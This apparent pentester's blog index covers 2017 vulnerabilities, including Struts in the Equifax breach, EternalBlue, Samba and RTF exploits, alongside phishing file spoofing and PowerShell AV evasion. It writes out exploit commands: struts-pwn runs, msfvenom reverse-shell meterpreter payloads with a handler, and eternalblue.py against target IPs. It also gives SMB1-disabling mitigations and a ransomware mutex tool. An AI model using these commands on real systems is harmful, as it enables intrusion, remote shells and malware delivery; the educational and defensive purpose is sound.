Equihax


In July, CVE-2017-9805, was reserved for the Apache Struts RCE vulnerability in the REST plugin. Apache Struts 2.5 through 2.5.12 that are using REST plugin are vulnerable to this attack. It had an initial disclosure on 7/17/2017, and a patch was released recently on 9/5/2017, with Apache updating Struts to version 2.5.13 was released. The flaw exists in using the Struts REST plugin with XStream handler to handle XML payloads. If exploited correctly, it allows a remote unauthenticated attacker to run malicious code on the application server to either take over the machine or launch further attacks from it. The problem occurs in XStreamHandler’s toObject () method, which does not impose any restrictions on the incoming value when using XStream deserialization into an object. lgtm has in in depth article along with a press release from Apache Foundation. The company Lgtm, who discovered the CVE-2017-9805 vulnerability, had warned that at least 65 percent of Fortune 100 companies use Struts, and they could all be exposed to remote attacks due to this vulnerability.

Equifax, one of the “big-three” U.S. credit bureaus was most likely, and unfortunately, not watching the bleeding-edge of security to prevent their server from being compromised. When they discovered the “unauthorized access” on July 29, they called in the security team from Mandiant to help them figure out the fallout of having potentially 143 million people’s PII released to the hackers. They released a video on September 7th, urging people to sign up on equifaxsecurity2017.com, which it itself was a shitshow, along with it being a poorly coded site, it was also flagged as a phishing site and didn’t even seem to be looking up the data correctly, with people using false info and still getting the same response from the site as a real account would. I’d be weary to submit my information to that site, along with some reports that the wording in the site gives them a loophole on you not being able to be part of a class action lawsuit if that ever comes to fruition.
. Below is a video from the CEO of Equifax about the incident.


Rick Smith, Chairman and CEO of Equifax Inc., on cybersecurity incident involving consumer information. Equifax has established a dedicated website, www.equifaxsecurity2017.com, to help consumers determine if their information has been potentially impacted and to sign up for credit file monitoring and identity theft protection.


There’s been speculation that this Struts vulnerability is how Equifax were owned. Looking into how the exploit can be recreated shows how easy it is for an attacker to take control of a server. The team from Metasploit created a module to trigger the CVE-2017-9805 vulnerability that was released shortly after its disclosure.

For those who would like to try this out at home in your ‘test’ lab, you can quickly test this out against your test server on a linux box, like using the Kali distro.
wget https://raw.githubusercontent.com/wvu-r7/metasploit-framework/5ea83fee5ee8c23ad95608b7e2022db5b48340ef/modules/exploits/multi/http/struts2_rest_xstream.rbcp struts2_rest_xstream.rb /usr/share/metasploit-framework/modules/exploits/multi/http/ run msfconsole and load the module by running
use exploit/multi/http/struts2_rest_xstreamshow options

Someone also anonymously released this gist on github the same day showing how you can simply exploit Struts.

Mazin Ahmed released some python code on his github that allows you to check for a vuln server or list of servers easily
Checking if the vulnerability exists against a single URL.python struts-pwn.py --url 'http://example.com/struts2-rest-showcase/orders/3'Exploiting a single URL.python struts-pwn.py --exploit --url 'http://example.com/struts2-showcase/index.action' -c 'echo test > /tmp/struts-pwn'

So make sure you patch your server if you’re running Struts, if you dont have a webserver running Struts, then all you have to do is worry about your Identity being stolen if you’re an American.
Sign up for credit monitoring if you can, and then freeze your credit files at the major credit bureaus. Information for how to file a freeze is available here.

CVE-2017-0213 – Windows COM EoP

Wrote another blog post for Milton Security about details of a vulnerability that James Forshaw of Google Project Zero found in January, that exploits a bug in Windows COM Aggregate Marshaler. An attacker can use this bug to elevate privileges on Windows machines.

Microsoft had 90 days to patch, which they have with last month’s security updates. The post includes a proof of concept code for 32 and 64 bit versions of Windows from Win7-10 and Server 2k8-2k16.
https://www.miltonsecurity.com/company/blog/cve-2017-0213-windows-com-privilege-escalation-vulnerability

EternalRed – CVE-2017-7494

I wrote another post for the Milton Security blog on the CVE-2017-7494 Samba exploit, which affects Linux machines running Samba 3.5.0 – 4.5.4/4.5.10/4.4.14. This also includes NAS devices that many people do not patch regularly. In the blog post i talked about what Samba is and how it has been vulnerable for the last 7 years due to this bug. I also go over on how to test/ exploit your machine to see if you’re vulnerable. I also cover some mitigations, the maintainers of the Samba project have provided a patch so I would advise you install it as soon as possible, some NAS firmware upgrades have been available from Netgear and Synology already.

Below is a demonstration of how easy it is to gain access on a vulnerable machine.

Exploiting CVE-2017-7494 with is_known_pipename Metasploit module

CVE-2017-0199 exploiting and preventing – guest blog

Phishing scams tricking unsuspecting users into opening nefarious files are nothing new, and attackers have using weaponized documents for just about as long. This week, I had the pleasure of being featured on Milton Security’s blog to talk about a new attack that was spotted as early as last year, and was finally patched by Microsoft in April. I went over this CVE-2017-0199 vulnerability that affected Windows based machines using Microsoft Word and the default built-in Wordpad, that enabled an attacker to send a malicious RTF file that would execute a HTA file remotely without any user interaction besides opening the file. I went over how to create the file using Metasploit, a python script, and finally just using Microsoft Word itself and editing the file to make it autorun. Spear-phishing attacks could allow the attacker to send these files to their victims over a spoofed in email and gain a foothold into the victim’s network if they weren’t properly patched which the article also covered towards the end on how to mitigate. So head over there and check it out. https://www.miltonsecurity.com/company/blog/analysis-cve-2017-0199-ms-word-threats-are-back

M17-010 EternalBlue

A few weeks ago ShadowBrokers released a dump of NSA/EquationGroup tools used to exploit various machines that they previously tried to auction off unsuccessfully. One of the exploits was for Windows SMB RCE which allowed an unauthenticated attacker to gain System-level privileges on target machines remotely by sending a specially crafted packet to a targeted SMB server. Microsoft quietly patched this as MS17-010 a month before, in March, before the dump was even made public. Although the dump was supposedly stolen around 2013, this affected Windows machines from Win2k up to Win2k16. Most reliable targets were Win7 and Win2k8 R2.


One exploit was codenamed EternalBlue. Everyone quickly jumped on the tools and found that along with ExternalBlue there was another tool called DoublePulsar that allowed you to inject shellcode or DLLs into the victim target after they were exploited with EternalBlue, it sets up the APC call with some user mode shellcode that would perform the DLL load avoiding use of the standard LoadLibrary call. DOUBLEPULSAR implements a loader that can load almost any DLL. A few people had writeups [1] & [2] on how to successfully install the tools in Windows and on Wine on Linux using older versions of Python. It was also discovered you could replace the DoublePulsar .dll with something like Meterpreter or Empire to have more control over your target with the need to use the NSA-provided GUI tool called FuzzBunch.

One could simply use Metasploit to create a .dll using:
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.2.153 LPORT=9898 -f dll -o meterpreter.dll
msfconsole -x "use exploit/multi/handler;set LHOST 192.168.2.153;set LPORT 9898;\
set PAYLOAD windows/x64/meterpreter/reverse_tcp;set ExitOnSession false;exploit -j"

This will create a .dll and open a reverse handler, then you would only need to copy or point to the dll from your attacking machine to use.

@JennaMagius and @zerosum0x0 from RiskSense took a different approach to the tool by replaying network activity of the the attack using a Python script, they were able to eliminate the need to use older versions of Python and needing to do without going through the EternalBlue/DoublePulsar scripts and you are now able to load a Meterpreter payload automatically to the victim with only passing the IP and the path to your Meterpreter payload as parameters. https://github.com/RiskSense-Ops/MS17-010/tree/master/exploits/eternalblue
On Kali create your own bin payload (edit to your own IP & port):
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.101 LPORT=9898 -f raw -o test.bin
then with python 3.6.1 on Windows or Linux run:
C:\MS17-010-master\exploits\eternalblue>python eternalblue.py 192.168.1.129 test.bin

They’ve concluded that there is a buffer overflow memmove operation in Srv!SrvOs2FeaToNt. The size is calculated in Srv!SrvOs2FeaListSizeToNt, with mathematical error where a DWORD is subtracted into a WORD.So far they’ve gotten Win2k8 R2 to trigger the exploit reliably and are continuing to work on different Windows versions and architecture.

UPDATE:
They have just released a Metasploit module that targets Win7 and Win2k8 x64 ::HERE::

UPDATE 2:
A ransomware worm called WCRY or WannaCry using the same codebase has been spreading over the past few days using the same scanning technique and infection. It’s been hitting thousands of unpatched machines all over the world, UK hospitals, Telefonica, FedEx, and other businesses were hit by attack.

When it successfully infects a vulnerable computer, the malware runs kernel-level shellcode that has been copied from DOUBLEPULSAR, but with certain adjustments to drop and execute the ransomware dropper payload, both for x86 and x64 systems.
It encrypts a computer’s files and demands a $300 Bitcoin ransom before unlocking it. Not only does it encrypt your files it continues to scan for other PCs to infect within the network and to PCs outside the network.

I created a simple tool that prevents the worm from encrypting your files and spreading itself by creating a MUTEX named ‘Global\MsWinZonesCacheCounterMutexA’, that the worm uses to check to see if it already infected the target, thus it exits its code. Get it from https://github.com/xillwillx/WCRY-Ransomeware-Mutex. This prevents the original variant of the worm, no guarantee that someones going to modify this name in future variants.

Other preventions you can do to stop from getting infected from EternalBlue/DoublePulsar is just run any of these commands in an Elevated Command Prompt on your machine dism /online /norestart /disable-feature /featurename:SMB1Protocol or sc.exe config lanmanworkstation depend= bowser/mrxsmb20/nsi
sc.exe config mrxsmb10 start= disabled

from Elevated Powershell Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters" SMB1 -Type DWORD -Value 0 -Force
To remove SMB v1 in Windows 8.1, Windows 10, Windows 2012 R2, and Windows Server 2016 use elevated Powershell:
Remove-WindowsFeature FS-SMB1 or Disable-WindowsOptionalFeature -Online -FeatureName smb1protocol
Note You must restart the computer after you make these changes. Since most networks do not need a legacy protocol like SMBv1, it shouldn’t break anything important.

And as always, update your machines, there’s been patches available for for 2 months and an out of the ordinary patch for unsupported WinXP/Vista/2k3/2k8 that was released. http://www.catalog.update.microsoft.com/Search.aspx?q=KB4012598. Also consider adding a rule on your router or firewall to block incoming SMB traffic on port 445

Kali 2017.1 Released – Troubleshooting hardware during install

I have a cracking box that was currently Running Win7 pro that I used with hashcat. I wanted to switch to Kali so it’s easier to manage wordlists etc.. and wanted to use a web frontend to manage the cracking. Trying out the new rolling 2017.1 I ran into an issue with usb keyboard/mouse not working when using the Kali graphical installer, on a Gigabyte GA-970A-D3P (rev. 2.x) motherboard with an AMD FX-8320, so I found if I enable iommu in the BIOS settings they work again , but then I had another issue with AMD-VI and other issues during install.

I got to the part where its looking for the CD drive (even though im installing from USB) I saw fixes online where it says to get to shell prompt and type something like:
mount -t vfat /dev/dsb1 /cdrom
or it said to remove the USB and reinsert and try to look for CD but neither worked for me.

Similar to this issue here, http://forums.debian.net/viewtopic.php?f=10&t=120746 , but since Kali wasn’t installed yet I couldn’t obviously edit GRUB. I found out the right fix, apparently this has been an issue for a few years on a different distros, not just Debian.

1. IOMMU should be enabled in the BIOS.

2. Boot from USB on splash screen go down to graphical installer & press tab (or if in UEFI mode press ‘e’) and append iommu=soft to the boot option. The install process should give you no issues now and the keyboard and mouse should work.

3. When you reboot the machine after kali installation completes and reboot , Pressing ‘E’ on the menu item will enter edit mode, where iommu=soft should be added to the end of the line which begins with linux. After this the kali should boot.

4. When finally booted into Kali Open a terminal, and make the change permanent by editing GRUB’s configuration file. Run vi /etc/default/grub and add this to the bottom:
GRUB_LINUX_CMD_LINE="iommu=soft"
save the file then update-grub and hit enter
.
You should now be able reboot with no issues.

Powershell to exe using iexpress

Saw something on twitter today about using the old standby program, iexpress.exe, which is still available in Win10, you can package your powershell scripts inside an executable. You can use it to run malicious powershell scripts etc…
SO I was thinking of some fun things to do with it, getting reverse shells, dumping passwords with mimikatz, compiling .cs files etc to evade AV and whitelisting. It’s fairly simple to do ,here’s an example of a powershell reverse shell: Continue reading

ms16-032 one-liners

I was playing around with box in my lab earlier testing out ms16-032, which is a privilege escalation exploit that got patched earlier this year that affected windows versions vista,2k8,7,8.1,2k12, and 10. It was a bug in the Secondary Logon service that allows you to leak a handle opened in a privileged process into a lower privileged process. @FuzzySec made a powershell script to exploit this that works really well, but I wanted to make it into as easy 1-liner to paste into a cmd prompt. Continue reading

tricky.lnk – Unicode Text Spoofing

Collaborative editing can quickly become a textual rap battle fought with increasingly convoluted invocations of U+202a to U+202e

Bidirectional Unicode spoofing is not a new concept, malware has been using the technique for the last decade, but I was toying around with unicode earlier today for a phishing engagement, by default Win7 doesn’t allow you to create filenames with unicode chars unless you:

    a. Open RegEdit
    b. Navigate to HKey_Current_User/Control Panel/Input Method
    c. Set REG_SZ “EnableHexNumpad” to be “1” (If there is no EnableHexNumpad, then add it and set its value to 1).
    d. Reboot your system.

I didnt want to do this so I created a .vbs script that creates a .lnk file that spoofs the file extension with Unicode chars. This allows you to reverse the “.lnk” file extension, append “.txt” to the end and change the icon to notepad.exe’s icon to make it appear as a text file. When executed, the Target payload is a powershell webdl and execute. Continue reading

Pivoting through Tomcat

On a recent pen-test engagement we had come across a Tomcat server with default creds. Trying to old tried and true methods with Metasploit did not work to get a shell on the box , which was running proprietary IBM_AIX. The exploit would be successful but no connect-back. Because of the limited time instead of trying to test for egress (and later finding out theres no payloads for metasploit), we tried another method of uploading a JSP .war file to the box that once deployed, enabled us to browse and run commands. Continue reading